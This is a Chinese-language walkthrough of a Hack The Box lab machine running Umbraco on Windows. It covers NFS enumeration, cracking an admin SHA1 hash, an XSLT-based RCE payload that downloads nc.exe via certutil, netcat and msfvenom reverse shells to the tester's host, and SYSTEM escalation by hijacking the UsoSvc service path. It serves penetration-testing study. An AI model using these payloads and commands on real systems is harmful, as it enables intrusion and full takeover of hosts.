概述

目标主机是一台windows服务器，上面部署了一个web站点，对外开放了21、80、445、2049等，先利用目标机器开放的nfs获取信息，发现共享目录下面有一个日志文件中记录了疑似口令的hash，通过彩虹表获取到明文密码，然后通过获取到的信息得知web网站的CMS是Umbraco,查询版本号发现有一个RCE的漏洞，利用漏洞获取一个反弹shell，进一步发现该账号可以修改UsoSvc服务，进而通过该服务获取提权的反弹shell

信息收集

root@vultr:~# nmap -sV -sC 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-26 06:23 UTC
Nmap scan report for 10.10.10.180
Host is up (0.072s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3         2049/udp  nfs
|   100003  2,3,4       2049/tcp  nfs
|   100005  1,2,3       2049/tcp  mountd
|   100005  1,2,3       2049/udp  mountd
|   100021  1,2,3,4     2049/tcp  nlockmgr
|   100021  1,2,3,4     2049/udp  nlockmgr
|   100024  1           2049/tcp  status
|_  100024  1           2049/udp  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3m53s, deviation: 0s, median: 3m53s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-26 06:28:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds

从扫描结果看到目标主机开放了nfs服务，nfs工具查看目标目录并挂载到本机

apt install nfs-common

root@vultr:~# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@vultr:~# mount -t nfs 10.10.10.180:/site_backups /htb
root@vultr:~# ls -l /htb
total 115
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 20 17:17 App_Data
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 App_Plugins
drwx------ 2 nobody 4294967294  8192 Feb 20 17:16 Config
-rwx------ 1 nobody 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 Media
drwx------ 2 nobody 4294967294  8192 Feb 20 17:16 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 05:57 Web.config
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 17:16 bin
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 css
-rwx------ 1 nobody 4294967294   152 Nov  1  2018 default.aspx
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 scripts

通过一番查看，最终在App_Data下面的Umbraco.sdf里面找到疑似admin账号和口令

root@vultr:/htb/App_Data# strings Umbraco.sdf |grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

从上面的信息看b8be16afba8c314ad33d812f22a04991b90e2aaa应该是sha1，随便找个sha1破解的网站查一下，发现原始信息就是baconandcheese，简单验证一下发现这个账号应该是一个应用账号，没法直接登录OS
从获取到的信息可以知道，目标机器使用的CMS是Umbraco，google一下发现一个Umbraco RCE漏洞的PoC，修改里面的Payload，先把nc.exe下载过去

payload = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
public string xml()
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.94/nc.exe c:/windows/temp/nc.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; 
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output;Console.WriteLine(output); } 
 </msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
 </xsl:template> 
</xsl:stylesheet> """;

执行，nc成功下载到目标机器

root@vultr:~# python3 umb.py
Start
[]
<div id="result"><?xml version="1.0" encoding="utf-16"?>****  Online  ****
  0000  ...
  8eb0
CertUtil: -URLCache command completed successfully.
</div>
End

然后在本机开启nc监听4444端口准备接收反弹shell

nc -lvnp 4444

接下来修改payload，让目标机器执行nc启动反弹shell，修改payload中的命令部分，再次执行

/c c:/windows/temp/nc.exe 10.10.14.94 4444 -e cmd.exe

获取到反弹shell

root@vultr:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49767
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

权限提升

收集目标主机信息，这里使用PowerUp.ps1

c:\Users\Public>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Public> . ./PowerUp.ps1
. ./PowerUp.ps1
PS C:\Users\Public> invoke-allchecks
invoke-allchecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


[*] Checking service permissions...


ServiceName   : UsoSvc
Path          :  C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

看到返回信息提示我们可以利用UsoSvc的漏洞，这个通过这种方式我们可以让UsoSvc服务加载任意可执行程序，进而达成反弹shell的目的。
先尝试Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\windows\temp\nc.exe -e cmd.exe 10.10.14.94 2222"不知道为啥不起作用，于是还是用msfvenom制作一个payload

sfvenom -p windows/shell_reverse_tcp lhost=10.10.14.94 lport=2222 -f exe >re.exe

本地先起一个nc监听2222端口，准备接收反弹shell，然后把re.exe上传到目标主机，然后在目标机器上修改usosvc配置，并重启服务

c:\Users\Public>sc config usosvc binpath="c:\windows\temp\re.exe"
sc config usosvc binpath="c:\windows\temp\re.exe"
[SC] ChangeServiceConfig SUCCESS

c:\Users\Public>sc stop usosvc
sc stop usosvc
[SC] ControlService FAILED 1062:

The service has not been started.


c:\Users\Public>sc start usosvc
sc start usosvc

此时本机接收到反弹shell

root@vultr:~# nc -lvnp 2222
listening on [any] 2222 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49779
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>dir c:\users\administrator\desktop
dir c:\users\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of c:\users\administrator\desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
05/26/2020  12:38 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  19,239,432,192 bytes free